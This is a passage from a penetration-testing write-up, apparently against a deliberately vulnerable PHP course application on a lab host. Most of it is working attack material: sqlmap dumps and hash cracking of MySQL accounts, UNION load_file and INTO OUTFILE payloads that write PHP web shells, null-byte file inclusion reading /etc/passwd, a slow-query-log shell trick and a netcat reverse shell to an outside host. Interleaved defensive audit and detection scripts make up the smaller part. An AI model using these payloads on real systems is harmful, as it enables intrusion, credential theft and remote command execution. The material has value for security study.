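    if "x-frame-options" not in h:
        findings.append("missing X-Frame-Options")
    if "x-content-type-options" not in h:
        findings.append("missing X-Content-Type-Options")
    if "x-powered-by" in h:
        findings.append("X-Powered-By leaks " + h["x-powered-by"][0])
    for cookie in h.get("set-cookie", []):
        name = cookie.split("=", 1)[0]
        attrs = [a.strip().lower() for a in cookie.split(";")[1:]]
        if "httponly" not in attrs:
            findings.append("cookie %s without HttpOnly" % name)
    allowed = {m.strip().upper() for v in h.get("allow", []) for m in v.split(",")}
    if "TRACE" in allowed:
        findings.append("TRACE method enabled")
    server = h.get("server", [""])[0]
    ver = _version_tuple(server)
    if server.lower().startswith("apache/") and ver is not None and ver < apache_min:
        findings.append("outdated server banner " + server)
    return sorted(findings)


if __name__ == "__main__":
    for label, raw in (("weak", RAW_WEAK), ("hardened", RAW_HARDENED)):
        print(label, audit(raw) or ["no findings"])
```

The version floor defaults to 2.4.46 because that is the "current" release Nikto named in this scan; pass a newer tuple when re-running it later.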

image-20211129231615514

┌──(root💀kwkl)-[~]
└─# sqlmap -u 'http://172.16.70.141/index.php?id=3' -D mysql -T user --dump
        ___
       __H__                                                                                                                                                                                  
 ___ ___[']_____ ___ ___  {1.5.10#stable}                                                                                                                                                     
|_ -| . [.]     | .'| . |                                                                                                                                                                     
|___|_  ["]_|_|_|__,|  _|                                                                                                                                                                     
      |_|V...       |_|   https://sqlmap.org                                                                                                                                                  

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 23:14:31 /2021-11-29/

[23:14:31] [INFO] resuming back-end DBMS 'mysql' 
[23:14:31] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=8k7s0c8hh8h...9e6a2c7va3'). Do you want to use those [Y/n] y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=3 AND 9068=9068

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=3 AND (SELECT 1514 FROM (SELECT(SLEEP(5)))zENA)

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: id=3 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71626a7171,0x644c49467875614873585a5669644f7a74445a417779496e72634a56474474595a6e437542477350,0x716a6b6271)-- -
---
[23:14:32] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 5
web application technology: PHP, PHP 5.2.6, Apache 2.2.3
back-end DBMS: MySQL >= 5.0.12
[23:14:32] [INFO] fetching columns for table 'user' in database 'mysql'
[23:14:32] [INFO] fetching entries for table 'user' in database 'mysql'
[23:14:32] [INFO] recognized possible password hashes in column 'Password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[23:14:33] [INFO] writing hashes to a temporary file '/tmp/sqlmap7u2kha6j27776/sqlmaphashes-yz42cvrf.txt' 
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[23:14:34] [INFO] using hash method 'mysql_old_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 
[23:14:35] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] y
[23:14:37] [INFO] starting dictionary-based cracking (mysql_old_passwd)
[23:14:37] [INFO] starting 12 processes 
[23:14:41] [INFO] cracked password 'mysqlpass' for hash '6cbbdf9b35eb7db1'                                                                                                                   
[23:14:44] [INFO] using suffix '1'                                                                                                                                                           
[23:14:51] [INFO] using suffix '123'                                                                                                                                                         
[23:14:59] [INFO] using suffix '2'                                                                                                                                                           
[23:15:07] [INFO] using suffix '12'                                                                                                                                                          
[23:15:15] [INFO] using suffix '3'                                                                                                                                                           
[23:15:24] [INFO] using suffix '13'                                                                                                                                                          
[23:15:32] [INFO] using suffix '7'                                                                                                                                                           
[23:15:40] [INFO] using suffix '11'                                                                                                                                                          
[23:15:47] [INFO] using suffix '5'                                                                                                                                                           
[23:15:55] [INFO] using suffix '22'                                                                                                                                                          
[23:16:03] [INFO] using suffix '23'                                                                                                                                                          
[23:16:10] [INFO] using suffix '01'                                                                                                                                                          
[23:16:18] [INFO] using suffix '4'                                                                                                                                                           
[23:16:26] [INFO] using suffix '07'                                                                                                                                                          
[23:16:34] [INFO] using suffix '21'                                                                                                                                                          
[23:16:42] [INFO] using suffix '14'                                                                                                                                                          
[23:16:50] [INFO] using suffix '10'                                                                                                                                                          
[23:16:58] [INFO] using suffix '06'                                                                                                                                                          
[23:17:06] [INFO] using suffix '08'                                                                                                                                                          
[23:17:13] [INFO] using suffix '8'                                                                                                                                                           
[23:17:21] [INFO] using suffix '15'                                                                                                                                                          
[23:17:29] [INFO] using suffix '69'                                                                                                                                                          
[23:17:36] [INFO] using suffix '16'                                                                                                                                                          
[23:17:44] [INFO] using suffix '6'                                                                                                                                                           
[23:17:51] [INFO] using suffix '18'                                                                                                                                                          
[23:17:59] [INFO] using suffix '!'                                                                                                                                                           
[23:18:07] [INFO] using suffix '.'                                                                                                                                                           
[23:18:14] [INFO] using suffix '*'                                                                                                                                                           
[23:18:22] [INFO] using suffix '!!'                                                                                                                                                          
[23:18:29] [INFO] using suffix '?'                                                                                                                                                           
[23:18:37] [INFO] using suffix ';'                                                                                                                                                           
[23:18:44] [INFO] using suffix '..'                                                                                                                                                          
[23:18:52] [INFO] using suffix '!!!'                                                                                                                                                         
[23:18:59] [INFO] using suffix ', '                                                                                                                                                          
[23:19:07] [INFO] using suffix '@'                                                                                                                                                           
Database: mysql                                                                                                                                                                              
Table: user
[4 entries]
+-----------------------+----------+------------------------------+----------+-----------+-----------+------------+------------+------------+------------+------------+-------------+-------------+-------------+-------------+-------------+-------------+-------------+-------------+--------------+--------------+--------------+--------------+---------------+---------------+----------------+-----------------+-----------------+-----------------+------------------+------------------+------------------+------------------+--------------------+---------------------+----------------------+-----------------------+
| Host                  | User     | Password                     | ssl_type | Drop_priv | File_priv | Alter_priv | Grant_priv | Index_priv | Super_priv | ssl_cipher | Create_priv | Delete_priv | Insert_priv | Reload_priv | Select_priv | Update_priv | max_updates | x509_issuer | Execute_priv | Process_priv | Show_db_priv | x509_subject | Shutdown_priv | max_questions | Show_view_priv | References_priv | Repl_slave_priv | max_connections | Create_user_priv | Create_view_priv | Lock_tables_priv | Repl_client_priv | Alter_routine_priv | Create_routine_priv | max_user_connections | Create_tmp_table_priv |
+-----------------------+----------+------------------------------+----------+-----------+-----------+------------+------------+------------+------------+------------+-------------+-------------+-------------+-------------+-------------+-------------+-------------+-------------+--------------+--------------+--------------+--------------+---------------+---------------+----------------+-----------------+-----------------+-----------------+------------------+------------------+------------------+------------------+--------------------+---------------------+----------------------+-----------------------+
| localhost             | root     | 6cbbdf9b35eb7db1 (mysqlpass) | <blank>  | Y         | Y         | Y          | Y          | Y          | Y          | <blank>    | Y           | Y           | Y           | Y           | Y           | Y           | 0           | <blank>     | Y            | Y            | Y            | <blank>      | Y             | 0             | Y              | Y               | Y               | 0               | Y                | Y                | Y                | Y                | Y                  | Y                   | 0                    | Y                     |
| localhost.localdomain | root     | <blank>                      | <blank>  | Y         | Y         | Y          | Y          | Y          | Y          | <blank>    | Y           | Y           | Y           | Y           | Y           | Y           | 0           | <blank>     | Y            | Y            | Y            | <blank>      | Y             | 0             | Y              | Y               | Y               | 0               | Y                | Y                | Y                | Y                | Y                  | Y                   | 0                    | Y                     |
| 127.0.0.1             | root     | <blank>                      | <blank>  | Y         | Y         | Y          | Y          | Y          | Y          | <blank>    | Y           | Y           | Y           | Y           | Y           | Y           | 0           | <blank>     | Y            | Y            | Y            | <blank>      | Y             | 0             | Y              | Y               | Y               | 0               | Y                | Y                | Y                | Y                | Y                  | Y                   | 0                    | Y                     |
| %                     | cms_user | 2e0cfd856355b099             | <blank>  | Y         | Y         | Y          | N          | Y          | Y          | <blank>    | Y           | Y           | Y           | Y           | Y           | Y           | 0           | <blank>     | Y            | Y            | Y            | <blank>      | Y             | 0             | Y              | Y               | Y               | 0               | Y                | Y                | Y                | Y                | Y                  | Y                   | 0                    | Y                     |
+-----------------------+----------+------------------------------+----------+-----------+-----------+------------+------------+------------+------------+------------+-------------+-------------+-------------+-------------+-------------+-------------+-------------+-------------+--------------+--------------+--------------+--------------+---------------+---------------+----------------+-----------------+-----------------+-----------------+------------------+------------------+------------------+------------------+--------------------+---------------------+----------------------+-----------------------+

[23:19:15] [INFO] table 'mysql.`user`' dumped to CSV file '/root/.local/share/sqlmap/output/172.16.70.141/dump/mysql/user.csv'
[23:19:15] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/172.16.70.141'

[*] ending @ 23:19:15 /2021-11-29/
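The dump above is also an audit of the database: root has two host entries with no password at all, and the application account cms_user is reachable from any host ('%') and holds FILE and SUPER. FILE is precisely what a SQL injection running as that account needs for LOAD_FILE() and INTO OUTFILE, both of which appear later in this write-up. The script below is an added example, not from the write-up or from sqlmap: it encodes those checks over rows transcribed from the table, and the remediation statements it prints assume the application only needs DML on a database named cms (an assumption).

```python
"""Audit mysql.user rows for the weaknesses visible in the sqlmap dump.

Added example (not from the write-up). USER_ROWS is transcribed from the
dumped table, reduced to the columns the checks need; the database name
'cms' in the remediation is an assumption.
"""
import re

# Constructed from the page's dump:
# (Host, User, Password, File_priv, Super_priv, Grant_priv)
USER_ROWS = [
    ("localhost",             "root",     "6cbbdf9b35eb7db1", "Y", "Y", "Y"),
    ("localhost.localdomain", "root",     "",                 "Y", "Y", "Y"),
    ("127.0.0.1",             "root",     "",                 "Y", "Y", "Y"),
    ("%",                     "cms_user", "2e0cfd856355b099", "Y", "Y", "N"),
]

OLD_HASH = re.compile(r"^[0-9a-f]{16}$")        # pre-4.1 OLD_PASSWORD() format
NATIVE_HASH = re.compile(r"^\*[0-9A-F]{40}$")   # 4.1+ mysql_native_password format


def classify_hash(value):
    """Name the hash format of one mysql.user Password value."""
    if value == "":
        return "blank"
    if OLD_HASH.match(value):
        return "old"
    if NATIVE_HASH.match(value):
        return "native"
    return "other"


def audit_user_table(rows):
    """Return (host, user, finding) tuples, one per weakness found."""
    findings = []
    for host, user, pw, file_priv, super_priv, grant_priv in rows:
        who = (host, user)
        kind = classify_hash(pw)
        if kind == "blank":
            findings.append(who + ("no password set",))
        elif kind == "old":
            # 16-hex-digit hashes are what sqlmap labelled 'mysql_old_passwd'
            findings.append(who + ("pre-4.1 password hash",))
        if host == "%":
            findings.append(who + ("reachable from any host",))
        if user != "root":
            # FILE lets the web app's own account run LOAD_FILE() and
            # SELECT ... INTO OUTFILE through any injection in the app.
            if file_priv == "Y":
                findings.append(who + ("FILE privilege on application account",))
            if super_priv == "Y":
                findings.append(who + ("SUPER privilege on application account",))
            if grant_priv == "Y":
                findings.append(who + ("GRANT OPTION on application account",))
    return findings


def remediation_sql(user, host, db):
    """Illustrative statements reducing an application account to DML on one database."""
    acct = "'%s'@'%s'" % (user, host)
    return [
        "REVOKE ALL PRIVILEGES, GRANT OPTION FROM %s;" % acct,
        "GRANT SELECT, INSERT, UPDATE, DELETE ON `%s`.* TO %s;" % (db, acct),
        "FLUSH PRIVILEGES;",
    ]


if __name__ == "__main__":
    for host, user, finding in audit_user_table(USER_ROWS):
        print("%-22s %-9s %s" % (host, user, finding))
    print("\n".join(remediation_sql("cms_user", "%", "cms")))
```

Beyond the REVOKE/GRANT pair, the account should be recreated bound to localhost rather than '%', the two password-less root rows dropped, and the remaining passwords reset so they are stored in the 4.1+ format instead of the 16-digit one.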

                                                                                                                                                                                              
┌──(root💀kwkl)-[~]
└─# sqlmap -u 'http://172.16.70.141/index.php?id=3' -D mysql -T user -C User,Password  --dump
        ___
       __H__                                                                                                                                                                                  
 ___ ___[)]_____ ___ ___  {1.5.10#stable}                                                                                                                                                     
|_ -| . [.]     | .'| . |                                                                                                                                                                     
|___|_  [(]_|_|_|__,|  _|                                                                                                                                                                     
      |_|V...       |_|   https://sqlmap.org                                                                                                                                                  

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 23:19:36 /2021-11-29/

[23:19:37] [INFO] resuming back-end DBMS 'mysql' 
[23:19:37] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=5k4l78aruoi...53j1etnj30'). Do you want to use those [Y/n] y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=3 AND 9068=9068

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=3 AND (SELECT 1514 FROM (SELECT(SLEEP(5)))zENA)

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: id=3 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71626a7171,0x644c49467875614873585a5669644f7a74445a417779496e72634a56474474595a6e437542477350,0x716a6b6271)-- -
---
[23:19:38] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 5
web application technology: PHP 5.2.6, PHP, Apache 2.2.3
back-end DBMS: MySQL >= 5.0.12
[23:19:38] [INFO] fetching entries of column(s) 'Password,`User`' for table 'user' in database 'mysql'
[23:19:38] [INFO] recognized possible password hashes in column 'Password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[23:19:39] [INFO] writing hashes to a temporary file '/tmp/sqlmapfgwkgd6528295/sqlmaphashes-hgq2jwa1.txt' 
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[23:19:40] [INFO] using hash method 'mysql_old_passwd'
[23:19:40] [INFO] resuming password 'mysqlpass' for hash '6cbbdf9b35eb7db1'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 
[23:19:42] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] y
[23:19:43] [INFO] starting dictionary-based cracking (mysql_old_passwd)
[23:19:43] [INFO] starting 12 processes 
[23:19:49] [INFO] using suffix '1'                                                                                                                                                           
[23:19:57] [INFO] using suffix '123'                                                                                                                                                         
[23:20:05] [INFO] using suffix '2'                                                                                                                                                           
[23:20:13] [INFO] using suffix '12'                                                                                                                                                          
[23:20:21] [INFO] using suffix '3'                                                                                                                                                           
[23:20:29] [INFO] using suffix '13'                                                                                                                                                          
[23:20:37] [INFO] using suffix '7'                                                                                                                                                           
[23:20:45] [INFO] using suffix '11'                                                                                                                                                          
[23:20:53] [INFO] using suffix '5'                                                                                                                                                           
[23:21:01] [INFO] using suffix '22'                                                                                                                                                          
[23:21:09] [INFO] using suffix '23'                                                                                                                                                          
[23:21:17] [INFO] using suffix '01'                                                                                                                                                          
[23:21:25] [INFO] using suffix '4'                                                                                                                                                           
[23:21:33] [INFO] using suffix '07'                                                                                                                                                          
[23:21:41] [INFO] using suffix '21'                                                                                                                                                          
[23:21:50] [INFO] using suffix '14'                                                                                                                                                          
[23:21:58] [INFO] using suffix '10'                                                                                                                                                          
[23:22:06] [INFO] using suffix '06'                                                                                                                                                          
[23:22:14] [INFO] using suffix '08'                                                                                                                                                          
[23:22:23] [INFO] using suffix '8'                                                                                                                                                           
[23:22:32] [INFO] using suffix '15'                                                                                                                                                          
[23:22:40] [INFO] using suffix '69'                                                                                                                                                          
[23:22:48] [INFO] using suffix '16'                                                                                                                                                          
[23:22:56] [INFO] using suffix '6'                                                                                                                                                           
[23:23:03] [INFO] using suffix '18'                                                                                                                                                          
[23:23:11] [INFO] using suffix '!'                                                                                                                                                           
[23:23:18] [INFO] using suffix '.'                                                                                                                                                           
[23:23:26] [INFO] using suffix '*'                                                                                                                                                           
[23:23:34] [INFO] using suffix '!!'                                                                                                                                                          
[23:23:41] [INFO] using suffix '?'                                                                                                                                                           
[23:23:49] [INFO] using suffix ';'                                                                                                                                                           
[23:23:56] [INFO] using suffix '..'                                                                                                                                                          
[23:24:05] [INFO] using suffix '!!!'                                                                                                                                                         
[23:24:13] [INFO] using suffix ', '                                                                                                                                                          
[23:24:21] [INFO] using suffix '@'                                                                                                                                                           
Database: mysql                                                                                                                                                                              
Table: user
[4 entries]
+----------+------------------------------+
| User     | Password                     |
+----------+------------------------------+
| root     | 6cbbdf9b35eb7db1 (mysqlpass) |
| root     | <blank>                      |
| root     | <blank>                      |
| cms_user | 2e0cfd856355b099             |
+----------+------------------------------+

[23:24:29] [INFO] table 'mysql.`user`' dumped to CSV file '/root/.local/share/sqlmap/output/172.16.70.141/dump/mysql/user.csv'
[23:24:29] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/172.16.70.141'

[*] ending @ 23:24:29 /2021-11-29/

                                                                                                                                                                                              
┌──(root💀kwkl)-[~]
└─# 

image-20211129232940623

┌──(root💀kwkl)-[~]
└─# sqlmap -dmysql://root:root@172.16.70.141:3306/cms --sql-shellselect @@version;                                                                                                        2 ⨯
        ___
       __H__                                                                                                                                                                                  
 ___ ___[)]_____ ___ ___  {1.5.10#stable}                                                                                                                                                     
|_ -| . [']     | .'| . |                                                                                                                                                                     
|___|_  ["]_|_|_|__,|  _|                                                                                                                                                                     
      |_|V...       |_|   https://sqlmap.org                                                                                                                                                  

Usage: python3 sqlmap [options]

sqlmap: error: no such option: --sql-shellselect
                                                                                                                                                                                              
┌──(root💀kwkl)-[~]
└─#   

image-20211129233547813

http://172.16.61.130/,apache_tmp.php?cmd=uname%20-a;%20cat%20/etc/redhat-release

http://172.16.70.141/,apache_tmp.php?cmd=uname%20-a;%20cat%20/etc/passwd

http://172.16.70.141/actions/login.php?action=../../conf/config.ini%00

http://172.16.70.141/actions/login.php?action=backdoor.php?cmd=ls%20/tmp%00


id=-1')) union select 1,"<?php phpinfo();?>",3 into outfile "\\tmp\\1.php"%23


http://172.16.70.141/index.php?id=4%20UNION%20select%201,load_file(%27/var/www/html/actions/login.php%27),3,4,5,6,7%20from%20dual

http://172.16.70.141/?id=4%20UNION%20select%201,load_file(%27/var/www/html/index.php%27),3,4,5,6,7%20from%20dual

image-20211130235205462

%20UNION%20select%201,load_file(%27/var/www/html/actions/login.php%27),3,4,5,6,7%20from%20dual

https://172.16.70.141/index.php?id=1%20%20UNION%20select%201,load_file(%27/var/www/html/index.php%27),3,4,5,6,7%20from%20dual

 * **/
//make sure the app will run!
include_once('inc/config_check.php');
session_start();
$logged_in = isset($_COOKIE['logged_in']) ? $_COOKIE['logged_in'] : 0;
//get configuration variables
$configs = parse_ini_file('conf/config.ini') or die("Error parsing config file conf/config.ini");
//set up loggin
include_once('lib/log.class.php');
$log = new Log();
//set up the db connection
$conn = mysql_connect($configs['database_host'], $configs['database_user'], $configs['database_pass']) or $log->append(mysqlerror());
mysql_select_db($configs['database_db']);
$action = (isset($_GET['action'])) ? $_GET['action'] : 'default';
$valid_actions = array(
    'default',
    'login',
    'add_event',
    'edit_event',
    'view_event',
    'delete_event',
    'logout',
    'users',
    'logs');
//auth check
$is_admin = 0;
if (isset($_COOKIE['user_id']) && isset($_COOKIE['hash'])) {
    $sql = 'SELECT user_id FROM user WHERE user_id = ' . $_COOKIE['user_id'] . ' AND user_password = \'' . $_COOKIE['hash'] . '\'';
    $retval = mysql_query($sql) or $log->append("Problem with sql $sql " . mysql_error());
    if (mysql_num_rows($retval) > 0 )
        $is_admin = 1;
}
$admin_actions = array('add_event', 'edit_event', 'view_event', 'delete_event', 'users', 'logs');
if (in_array($action, $admin_actions) && ! $is_admin)
    $action = 'default';
if (! in_array($action, $valid_actions))
    $action = 'default';
if ($action != 'delete_event' && $action != 'logout')
    include_once('inc/header.php');
include_once('actions/'.$action . '.php');
include_once('inc/footer.php');
?>
Posted by: 7
image3 

http://172.16.70.141/index.php?id=1%20UNION%20select%201,load_file(%27/var/www/html/actions/login.php%27),3,4,5,6,7%20from%20dual


 * **/
$logged_in = isset($_COOKIE['logged_in']) ? $_COOKIE['logged_in'] : 0;
if (isset($_POST['username']) && isset($_POST['password'])) {
    $sql = "select user_id from user where user_username = '" . $_POST['username'] . "'";
    $query = mysql_query($sql) or die("Query error with $sql: " . mysql_error());
    if ($query && mysql_num_rows($query) > 0) {
        //user exists
        $uname = mysql_fetch_object($query);
        $sql = "select * from user where user_id = " . $uname->user_id . " AND user_password = md5('" . $_POST['password'] . "')";
        $query = mysql_query($sql) or $log->append("Query error in login $sql " . mysql_error());
        $retval = array();
        if (! $query) {
            //no return value
        } else {
            $retval = mysql_fetch_object($query);
        }
    }
    if (isset($retval->user_id)) {
        setcookie("logged_in", 1, time()+3600);
        setcookie("user_id", $retval->user_id, time()+3600);
        setcookie("hash", $retval->user_password, time()+3600);
        $logged_in = 1;
    }
}
if ($logged_in)
    include_once('templates/logged_in.tpl');
else
    include_once('templates/'.$_GET['action'].'.tpl');
?>
Posted by: 7
image3 

image-20211130235353127


http://172.16.70.141/index.php?id=1%20UNION%20select%20NULL,NULL,NULL,NULL,NULL,NULL,%27%3C?php%20echo%20system($_POST[\%27cmd\%27]);?%3E%27%20INTO%20OUTFILE%20%27/tmp/008st7845.php%27


http://172.16.70.141/index.php?id=1%20UNION%20select%20NULL,NULL,NULL,NULL,NULL,NULL,%27%3C?php%20echo%20system($_POST[\%27cmd\%27]);?%3E%27%20INTO%20OUTFILE%20%27/tmp/008st7845.php%27

http://172.16.70.141/actions/login.php?action=/tmp/008st7845.php?cmd=ls%20/tmp%00

http://172.16.70.141/actions/login.php?action=../../conf/config.ini%00

http://172.16.70.141/actions/login.php?action=../../../../tmp/008st7845.php%00


http://172.16.70.141/actions/login.php?action=../../../../tmp/008st7845.php?cmd=ls%20/tmp%00

(1) Connect to the database

sqlmap -d "mysql://root:mysqlpass@172.16.70.141:3306/mysql" --os-shell

CREATE DATABASE foo;CREATE TABLE foo.bar ( baz VARCHAR(100) PRIMARY KEY );INSERT INTO foo.bar SELECT "<?php file_put_contents('shell.php','<?php @eval($_POST[1]);?>');?>";

select '<?php  @eval($_POST[1]);?>' into outfile '/var/www/html/11.php';

Check whether the slow query log is enabled: show variables like '%slow_query_log%';
Enable the slow query log: set global slow_query_log=1;
Change the absolute path of the log file: set global slow_query_log_file='E:/phpStudy2018/PHPTutorial/WWW/shell.php';
Write the shell into the log file: select '<?php @eval($_POST[1]);?>' or sleep(11);
————————————————
Copyright notice: this is an original article by CSDN blogger 「weixin_39872872」, licensed under CC 4.0 BY-SA; please include the original source link and this notice when reposting.
Original link: https://blog.csdn.net/weixin_39872872/article/details/112589789

image-20211201000253478

image-20211201003501538

cmd=echo "<?php echo system(\$_GET['cmd']);?>" > /var/www/html/.apache_tmp.php

cmd=echo "<?php @eval($_POST[1]);?>" > /var/www/html/.apache_tmp.php

iles/palm-pilot.png 1 13 admin \N \N \N \N \N \N
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
distcache:x:94:94:Distcache:/:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
squid:x:23:23::/var/spool/squid:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
pcap:x:77:77::/var/arpwatch:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin
john:x:500:500::/home/john:/bin/bash
linda:x:501:501::/home/linda:/bin/bash
fred:x:502:502::/home/fred:/bin/bash
molly:x:503:503::/home/molly:/bin/bash
toby:x:504:504::/home/toby:/bin/bash


 1       | 25e4ee4e9229397b6b17776bfceaf8e7 (adminpass) | admin  
 
 

cmd=echo "<?php echo @eval($_POST[x]);?>" > /var/www/html/.apache_tmp.php

cmd=echo "<?php echo system(\$_GET['cmd']);?>" > /var/www/html/2.php



select '<?php  @eval($_POST[1]);?>' into outfile '/var/www/html/2.php'


cmd=cp /tmp/008st7846.php /var/www/html/11.php

cmd=chmod 777 /var/www/html/11.php

cmd=chmod 777 /var/www/html/nc

cmd=/var/www/html/netcat -e
/bin/sh 172.16.61.132 3333




image-20211201235951851

image-20211202000011608

image-20211202000103616

pinginglab's method:

 nmap -A -v -sS -sV -p- 172.16.70.141
 
http://172.16.70.141/index.php?id=4AND%20SLEEP(5)

='admin', user_password=md5('adminpass');


http://172.16.70.141/sql/db.sql

http://172.16.70.141/docs/

http://172.16.70.141/actions/login.php?action=../../../../etc/passwd%00
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
distcache:x:94:94:Distcache:/:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
squid:x:23:23::/var/spool/squid:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
pcap:x:77:77::/var/arpwatch:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin
john:x:500:500::/home/john:/bin/bash
linda:x:501:501::/home/linda:/bin/bash
fred:x:502:502::/home/fred:/bin/bash
molly:x:503:503::/home/molly:/bin/bash
toby:x:504:504::/home/toby:/bin/bash


 1       | 25e4ee4e9229397b6b17776bfceaf8e7 (adminpass) | admin  


Download and audit the source
default.php
<?php 
/**
 * This is the default controller.
 * This application is meant to be part of the PHP Code Auditing 
 * course offered by SAS Information Security.  Don *not* install
 * this application on a live server
 * 
 * @package PHP Code Auditing 
 * @author Justin C. Klein Keane <jukeane@sas.upenn.edu>
 * 
**/
$id = isset($_GET['id']) ? $_GET['id'] : 0;
In default.php there is SQL-injectable code: the user-controlled parameter $id is not filtered or validated in any way, so an injection flaw arises.


File inclusion
 if ($logged_in) 
    include_once('templates/logged_in.tpl');
else 
    include_once('templates/'.$_GET['action'].'.tpl');
?>
A file inclusion was found in login.php; in actual testing a %00 null-byte truncation is needed to bypass the appended .tpl suffix.
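As an added example (not code from this writeup or from the target application), the following Python turns the two audit findings into detection logic: it parses Apache combined-format access log lines and flags requests that carry the UNION / load_file / INTO OUTFILE payloads and the %00-truncated directory traversal seen in the URLs above. The log lines are constructed for the example and modelled on those URLs; the rule names and the time-based rule are my own additions.

```python
import re
from urllib.parse import unquote

# Constructed sample log (Apache combined format), modelled on the requests in
# this writeup; client IPs, timestamps and sizes are made up.
SAMPLE_LOG = """\
172.16.70.122 - - [30/Nov/2021:23:52:05 +0800] "GET /index.php?id=4 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
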